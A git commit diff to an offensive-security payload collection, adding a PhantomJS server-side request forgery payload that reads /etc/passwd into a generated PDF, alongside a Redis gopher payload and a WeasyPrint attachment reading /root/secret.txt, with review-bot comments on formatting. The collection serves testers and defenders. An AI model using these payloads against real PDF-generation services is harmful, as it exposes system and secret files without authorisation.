SSRF PDF PhantomJS

Swissky 2021-09-08 12:49:32 +02:00 committed by GitHub
parent 3af70155e2
commit c957271453
GPG key ID: 4AEE18F83AFDEB23


@ -450,7 +450,7 @@ gopher://127.0.0.1:6379/_save
## SSRF exploiting PDF file
![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.jpg?raw=true)
![https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png)
Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title)
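Review bot: the image's alt text is just the full URL repeated; replace it with a short description (e.g. `SSRF via PDF generator`) so it reads as Markdown and renders usefully when the image is missing. Also note the old link pointed at `SSRF_PDF.jpg?raw=true` while the new one points at `SSRF_PDF.png` on `raw.githubusercontent.com`, so confirm that the `.png` file actually exists at that path before merging.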
@ -458,6 +458,18 @@ Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR
<link rel=attachment href="file:///root/secret.txt">
```
Example with PhantomJS
```js
<script>
exfil = new XMLHttpRequest();
exfil.open("GET","file:///etc/passwd");
exfil.send();
exfil.onload = function(){document.write(this.responseText);}
exfil.onerror = function(){document.write('failed!')}
</script>
```
## Blind SSRF
> When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read.
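Review bot: the fence is tagged `js` but the block is an HTML fragment (`<script>…</script>`), so tag it `html`, consistent with the WeasyPrint snippet just above that uses `<link rel=attachment ...>`. Within the script, assign `exfil.onload` and `exfil.onerror` before calling `exfil.send()` so the handlers are registered before the request is dispatched, and add a blank line between "Example with PhantomJS" and the fence for consistent rendering. A one-line remark that this only works when the headless renderer is allowed to read `file://` URLs would also help readers understand what to check on the defensive side.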